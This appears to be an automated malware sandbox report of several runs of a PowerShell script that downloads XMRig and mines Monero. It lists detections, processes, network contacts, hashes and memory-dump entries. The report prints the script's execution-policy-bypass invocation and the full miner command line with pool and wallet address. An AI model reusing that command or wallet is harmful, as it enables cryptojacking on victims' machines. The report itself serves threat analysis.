N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp

Files

memory/1116-0-0x00007FFFF6303000-0x00007FFFF6305000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_li1vm1fz.sbo.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1116-9-0x0000024B51300000-0x0000024B51322000-memory.dmp

memory/1116-10-0x00007FFFF6300000-0x00007FFFF6DC2000-memory.dmp

memory/1116-11-0x00007FFFF6300000-0x00007FFFF6DC2000-memory.dmp

memory/1116-12-0x00007FFFF6300000-0x00007FFFF6DC2000-memory.dmp

memory/1116-14-0x0000024B51810000-0x0000024B51822000-memory.dmp

memory/1116-15-0x0000024B51490000-0x0000024B5149A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2956-46-0x0000026AC5F70000-0x0000026AC5F90000-memory.dmp

memory/2956-47-0x0000026AC7870000-0x0000026AC7890000-memory.dmp

memory/2956-48-0x00007FF626B40000-0x00007FF627773000-memory.dmp

memory/1116-49-0x00007FFFF6300000-0x00007FFFF6DC2000-memory.dmp

memory/1116-50-0x00007FFFF6303000-0x00007FFFF6305000-memory.dmp

memory/1116-51-0x00007FFFF6300000-0x00007FFFF6DC2000-memory.dmp

memory/2956-53-0x0000026AC78B0000-0x0000026AC78D0000-memory.dmp

memory/2956-52-0x0000026AC7890000-0x0000026AC78B0000-memory.dmp

memory/2956-54-0x00007FF626B40000-0x00007FF627773000-memory.dmp

memory/2956-55-0x00007FF626B40000-0x00007FF627773000-memory.dmp

memory/2956-56-0x00007FF626B40000-0x00007FF627773000-memory.dmp

memory/2956-57-0x0000026AC7890000-0x0000026AC78B0000-memory.dmp

memory/2956-58-0x0000026AC78B0000-0x0000026AC78D0000-memory.dmp

memory/2956-59-0x00007FF626B40000-0x00007FF627773000-memory.dmp

memory/2956-60-0x00007FF626B40000-0x00007FF627773000-memory.dmp

memory/2956-61-0x00007FF626B40000-0x00007FF627773000-memory.dmp

memory/2956-62-0x00007FF626B40000-0x00007FF627773000-memory.dmp

memory/2956-63-0x00007FF626B40000-0x00007FF627773000-memory.dmp

memory/2956-64-0x00007FF626B40000-0x00007FF627773000-memory.dmp

memory/2956-65-0x00007FF626B40000-0x00007FF627773000-memory.dmp

memory/2956-66-0x00007FF626B40000-0x00007FF627773000-memory.dmp

memory/2956-67-0x00007FF626B40000-0x00007FF627773000-memory.dmp

memory/2956-68-0x00007FF626B40000-0x00007FF627773000-memory.dmp

memory/2956-69-0x00007FF626B40000-0x00007FF627773000-memory.dmp

memory/2956-70-0x00007FF626B40000-0x00007FF627773000-memory.dmp

memory/2956-71-0x00007FF626B40000-0x00007FF627773000-memory.dmp

memory/2956-72-0x00007FF626B40000-0x00007FF627773000-memory.dmp

memory/2956-73-0x00007FF626B40000-0x00007FF627773000-memory.dmp

memory/2956-74-0x00007FF626B40000-0x00007FF627773000-memory.dmp

memory/2956-75-0x00007FF626B40000-0x00007FF627773000-memory.dmp

memory/2956-76-0x00007FF626B40000-0x00007FF627773000-memory.dmp

memory/2956-77-0x00007FF626B40000-0x00007FF627773000-memory.dmp

memory/2956-78-0x00007FF626B40000-0x00007FF627773000-memory.dmp

memory/2956-79-0x00007FF626B40000-0x00007FF627773000-memory.dmp

memory/2956-80-0x00007FF626B40000-0x00007FF627773000-memory.dmp

memory/2956-81-0x00007FF626B40000-0x00007FF627773000-memory.dmp

memory/2956-82-0x00007FF626B40000-0x00007FF627773000-memory.dmp

memory/2956-83-0x00007FF626B40000-0x00007FF627773000-memory.dmp

memory/2956-84-0x00007FF626B40000-0x00007FF627773000-memory.dmp

memory/2956-85-0x00007FF626B40000-0x00007FF627773000-memory.dmp

memory/2956-86-0x00007FF626B40000-0x00007FF627773000-memory.dmp

memory/2956-87-0x00007FF626B40000-0x00007FF627773000-memory.dmp

memory/2956-88-0x00007FF626B40000-0x00007FF627773000-memory.dmp

memory/2956-89-0x00007FF626B40000-0x00007FF627773000-memory.dmp

memory/2956-90-0x00007FF626B40000-0x00007FF627773000-memory.dmp

memory/2956-91-0x00007FF626B40000-0x00007FF627773000-memory.dmp

memory/2956-92-0x00007FF626B40000-0x00007FF627773000-memory.dmp

memory/2956-93-0x00007FF626B40000-0x00007FF627773000-memory.dmp

memory/2956-94-0x00007FF626B40000-0x00007FF627773000-memory.dmp

memory/2956-95-0x00007FF626B40000-0x00007FF627773000-memory.dmp

memory/2956-96-0x00007FF626B40000-0x00007FF627773000-memory.dmp

memory/2956-97-0x00007FF626B40000-0x00007FF627773000-memory.dmp

memory/2956-98-0x00007FF626B40000-0x00007FF627773000-memory.dmp

memory/2956-99-0x00007FF626B40000-0x00007FF627773000-memory.dmp

memory/2956-100-0x00007FF626B40000-0x00007FF627773000-memory.dmp

memory/2956-101-0x00007FF626B40000-0x00007FF627773000-memory.dmp

memory/2956-102-0x00007FF626B40000-0x00007FF627773000-memory.dmp

memory/2956-103-0x00007FF626B40000-0x00007FF627773000-memory.dmp

memory/2956-104-0x00007FF626B40000-0x00007FF627773000-memory.dmp

memory/2956-105-0x00007FF626B40000-0x00007FF627773000-memory.dmp

memory/2956-106-0x00007FF626B40000-0x00007FF627773000-memory.dmp

memory/2956-107-0x00007FF626B40000-0x00007FF627773000-memory.dmp

memory/2956-108-0x00007FF626B40000-0x00007FF627773000-memory.dmp

memory/2956-109-0x00007FF626B40000-0x00007FF627773000-memory.dmp

memory/2956-110-0x00007FF626B40000-0x00007FF627773000-memory.dmp

memory/2956-111-0x00007FF626B40000-0x00007FF627773000-memory.dmp

memory/2956-112-0x00007FF626B40000-0x00007FF627773000-memory.dmp

memory/2956-113-0x00007FF626B40000-0x00007FF627773000-memory.dmp

memory/2956-114-0x00007FF626B40000-0x00007FF627773000-memory.dmp

memory/2956-115-0x00007FF626B40000-0x00007FF627773000-memory.dmp

memory/2956-116-0x00007FF626B40000-0x00007FF627773000-memory.dmp

memory/2956-117-0x00007FF626B40000-0x00007FF627773000-memory.dmp

Analysis: behavioral27

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 04:13

Platform

win10v2004-20240508-en

Max time kernel

1791s

Max time network

1777s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
BE 88.221.83.187:443 www.bing.com tcp
US 8.8.8.8:53 187.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
BE 88.221.83.187:443 www.bing.com tcp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 211.143.182.52.in-addr.arpa udp

Files

memory/4496-0-0x00007FFE71AD3000-0x00007FFE71AD5000-memory.dmp

memory/4496-1-0x000002467FAB0000-0x000002467FAD2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_l2evhgln.1gz.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4496-11-0x00007FFE71AD0000-0x00007FFE72591000-memory.dmp

memory/4496-12-0x00007FFE71AD0000-0x00007FFE72591000-memory.dmp

memory/4496-14-0x00007FFE71AD0000-0x00007FFE72591000-memory.dmp

memory/4496-15-0x000002467FA80000-0x000002467FA92000-memory.dmp

memory/4496-16-0x000002467E170000-0x000002467E17A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/5096-47-0x0000015C56A90000-0x0000015C56AB0000-memory.dmp

memory/5096-48-0x0000015C56E00000-0x0000015C56E20000-memory.dmp

memory/5096-49-0x00007FF72ECC0000-0x00007FF72F8F3000-memory.dmp

memory/5096-50-0x00007FF72ECC0000-0x00007FF72F8F3000-memory.dmp

memory/4496-52-0x00007FFE71AD0000-0x00007FFE72591000-memory.dmp

memory/4496-51-0x00007FFE71AD3000-0x00007FFE71AD5000-memory.dmp

memory/5096-54-0x0000015CEB190000-0x0000015CEB1B0000-memory.dmp

memory/5096-53-0x0000015CEAF60000-0x0000015CEAF80000-memory.dmp

memory/5096-55-0x00007FF72ECC0000-0x00007FF72F8F3000-memory.dmp

memory/4496-56-0x00007FFE71AD0000-0x00007FFE72591000-memory.dmp

memory/5096-57-0x00007FF72ECC0000-0x00007FF72F8F3000-memory.dmp

memory/5096-59-0x0000015CEB190000-0x0000015CEB1B0000-memory.dmp

memory/5096-58-0x0000015CEAF60000-0x0000015CEAF80000-memory.dmp

memory/5096-60-0x00007FF72ECC0000-0x00007FF72F8F3000-memory.dmp

memory/5096-61-0x00007FF72ECC0000-0x00007FF72F8F3000-memory.dmp

memory/5096-62-0x00007FF72ECC0000-0x00007FF72F8F3000-memory.dmp

memory/5096-63-0x00007FF72ECC0000-0x00007FF72F8F3000-memory.dmp

memory/5096-64-0x00007FF72ECC0000-0x00007FF72F8F3000-memory.dmp

memory/5096-65-0x00007FF72ECC0000-0x00007FF72F8F3000-memory.dmp

memory/5096-66-0x00007FF72ECC0000-0x00007FF72F8F3000-memory.dmp

memory/5096-67-0x00007FF72ECC0000-0x00007FF72F8F3000-memory.dmp

memory/5096-68-0x00007FF72ECC0000-0x00007FF72F8F3000-memory.dmp

memory/5096-69-0x00007FF72ECC0000-0x00007FF72F8F3000-memory.dmp

memory/5096-70-0x00007FF72ECC0000-0x00007FF72F8F3000-memory.dmp

memory/5096-71-0x00007FF72ECC0000-0x00007FF72F8F3000-memory.dmp

memory/5096-72-0x00007FF72ECC0000-0x00007FF72F8F3000-memory.dmp

memory/5096-73-0x00007FF72ECC0000-0x00007FF72F8F3000-memory.dmp

memory/5096-74-0x00007FF72ECC0000-0x00007FF72F8F3000-memory.dmp

memory/5096-75-0x00007FF72ECC0000-0x00007FF72F8F3000-memory.dmp

memory/5096-76-0x00007FF72ECC0000-0x00007FF72F8F3000-memory.dmp

memory/5096-77-0x00007FF72ECC0000-0x00007FF72F8F3000-memory.dmp

memory/5096-78-0x00007FF72ECC0000-0x00007FF72F8F3000-memory.dmp

memory/5096-79-0x00007FF72ECC0000-0x00007FF72F8F3000-memory.dmp

memory/5096-80-0x00007FF72ECC0000-0x00007FF72F8F3000-memory.dmp

memory/5096-81-0x00007FF72ECC0000-0x00007FF72F8F3000-memory.dmp

memory/5096-82-0x00007FF72ECC0000-0x00007FF72F8F3000-memory.dmp

memory/5096-83-0x00007FF72ECC0000-0x00007FF72F8F3000-memory.dmp

memory/5096-84-0x00007FF72ECC0000-0x00007FF72F8F3000-memory.dmp

memory/5096-85-0x00007FF72ECC0000-0x00007FF72F8F3000-memory.dmp

memory/5096-86-0x00007FF72ECC0000-0x00007FF72F8F3000-memory.dmp

memory/5096-87-0x00007FF72ECC0000-0x00007FF72F8F3000-memory.dmp

memory/5096-88-0x00007FF72ECC0000-0x00007FF72F8F3000-memory.dmp

memory/5096-89-0x00007FF72ECC0000-0x00007FF72F8F3000-memory.dmp

memory/5096-90-0x00007FF72ECC0000-0x00007FF72F8F3000-memory.dmp

memory/5096-91-0x00007FF72ECC0000-0x00007FF72F8F3000-memory.dmp

memory/5096-92-0x00007FF72ECC0000-0x00007FF72F8F3000-memory.dmp

memory/5096-93-0x00007FF72ECC0000-0x00007FF72F8F3000-memory.dmp

memory/5096-94-0x00007FF72ECC0000-0x00007FF72F8F3000-memory.dmp

memory/5096-95-0x00007FF72ECC0000-0x00007FF72F8F3000-memory.dmp

memory/5096-96-0x00007FF72ECC0000-0x00007FF72F8F3000-memory.dmp

memory/5096-97-0x00007FF72ECC0000-0x00007FF72F8F3000-memory.dmp

memory/5096-98-0x00007FF72ECC0000-0x00007FF72F8F3000-memory.dmp

memory/5096-99-0x00007FF72ECC0000-0x00007FF72F8F3000-memory.dmp

memory/5096-100-0x00007FF72ECC0000-0x00007FF72F8F3000-memory.dmp

memory/5096-101-0x00007FF72ECC0000-0x00007FF72F8F3000-memory.dmp

memory/5096-102-0x00007FF72ECC0000-0x00007FF72F8F3000-memory.dmp

memory/5096-103-0x00007FF72ECC0000-0x00007FF72F8F3000-memory.dmp

memory/5096-104-0x00007FF72ECC0000-0x00007FF72F8F3000-memory.dmp

memory/5096-105-0x00007FF72ECC0000-0x00007FF72F8F3000-memory.dmp

memory/5096-106-0x00007FF72ECC0000-0x00007FF72F8F3000-memory.dmp

memory/5096-107-0x00007FF72ECC0000-0x00007FF72F8F3000-memory.dmp

memory/5096-108-0x00007FF72ECC0000-0x00007FF72F8F3000-memory.dmp

memory/5096-109-0x00007FF72ECC0000-0x00007FF72F8F3000-memory.dmp

memory/5096-110-0x00007FF72ECC0000-0x00007FF72F8F3000-memory.dmp

memory/5096-111-0x00007FF72ECC0000-0x00007FF72F8F3000-memory.dmp

memory/5096-112-0x00007FF72ECC0000-0x00007FF72F8F3000-memory.dmp

memory/5096-113-0x00007FF72ECC0000-0x00007FF72F8F3000-memory.dmp

memory/5096-114-0x00007FF72ECC0000-0x00007FF72F8F3000-memory.dmp

memory/5096-115-0x00007FF72ECC0000-0x00007FF72F8F3000-memory.dmp

memory/5096-116-0x00007FF72ECC0000-0x00007FF72F8F3000-memory.dmp

memory/5096-117-0x00007FF72ECC0000-0x00007FF72F8F3000-memory.dmp

memory/5096-118-0x00007FF72ECC0000-0x00007FF72F8F3000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:56

Platform

win11-20240426-en

Max time kernel

1799s

Max time network

1754s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 52.111.229.19:443 tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp

Files

memory/4968-0-0x00007FFACD433000-0x00007FFACD435000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ir2gzmux.uxe.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4968-9-0x0000023B6FCF0000-0x0000023B6FD12000-memory.dmp

memory/4968-10-0x00007FFACD430000-0x00007FFACDEF2000-memory.dmp

memory/4968-11-0x00007FFACD430000-0x00007FFACDEF2000-memory.dmp

memory/4968-12-0x00007FFACD430000-0x00007FFACDEF2000-memory.dmp

memory/4968-15-0x0000023B700E0000-0x0000023B700EA000-memory.dmp

memory/4968-14-0x0000023B70200000-0x0000023B70212000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2448-46-0x000001EB42010000-0x000001EB42030000-memory.dmp

memory/2448-47-0x000001EB43820000-0x000001EB43840000-memory.dmp

memory/2448-48-0x00007FF71EF90000-0x00007FF71FBC3000-memory.dmp

memory/4968-49-0x00007FFACD430000-0x00007FFACDEF2000-memory.dmp

memory/2448-51-0x000001EB43840000-0x000001EB43860000-memory.dmp

memory/2448-50-0x000001EBD6400000-0x000001EBD6420000-memory.dmp

memory/4968-53-0x00007FFACD433000-0x00007FFACD435000-memory.dmp

memory/2448-52-0x00007FF71EF90000-0x00007FF71FBC3000-memory.dmp

memory/2448-54-0x00007FF71EF90000-0x00007FF71FBC3000-memory.dmp

memory/2448-55-0x00007FF71EF90000-0x00007FF71FBC3000-memory.dmp

memory/2448-56-0x000001EBD6400000-0x000001EBD6420000-memory.dmp

memory/2448-57-0x000001EB43840000-0x000001EB43860000-memory.dmp

memory/2448-58-0x00007FF71EF90000-0x00007FF71FBC3000-memory.dmp

memory/2448-59-0x00007FF71EF90000-0x00007FF71FBC3000-memory.dmp

memory/2448-60-0x00007FF71EF90000-0x00007FF71FBC3000-memory.dmp

memory/2448-61-0x00007FF71EF90000-0x00007FF71FBC3000-memory.dmp

memory/2448-62-0x00007FF71EF90000-0x00007FF71FBC3000-memory.dmp

memory/2448-63-0x00007FF71EF90000-0x00007FF71FBC3000-memory.dmp

memory/2448-64-0x00007FF71EF90000-0x00007FF71FBC3000-memory.dmp

memory/2448-65-0x00007FF71EF90000-0x00007FF71FBC3000-memory.dmp

memory/2448-66-0x00007FF71EF90000-0x00007FF71FBC3000-memory.dmp

memory/2448-67-0x00007FF71EF90000-0x00007FF71FBC3000-memory.dmp

memory/2448-68-0x00007FF71EF90000-0x00007FF71FBC3000-memory.dmp

memory/2448-69-0x00007FF71EF90000-0x00007FF71FBC3000-memory.dmp

memory/2448-70-0x00007FF71EF90000-0x00007FF71FBC3000-memory.dmp

memory/2448-71-0x00007FF71EF90000-0x00007FF71FBC3000-memory.dmp

memory/2448-72-0x00007FF71EF90000-0x00007FF71FBC3000-memory.dmp

memory/2448-73-0x00007FF71EF90000-0x00007FF71FBC3000-memory.dmp

memory/2448-74-0x00007FF71EF90000-0x00007FF71FBC3000-memory.dmp

memory/2448-75-0x00007FF71EF90000-0x00007FF71FBC3000-memory.dmp

memory/2448-76-0x00007FF71EF90000-0x00007FF71FBC3000-memory.dmp

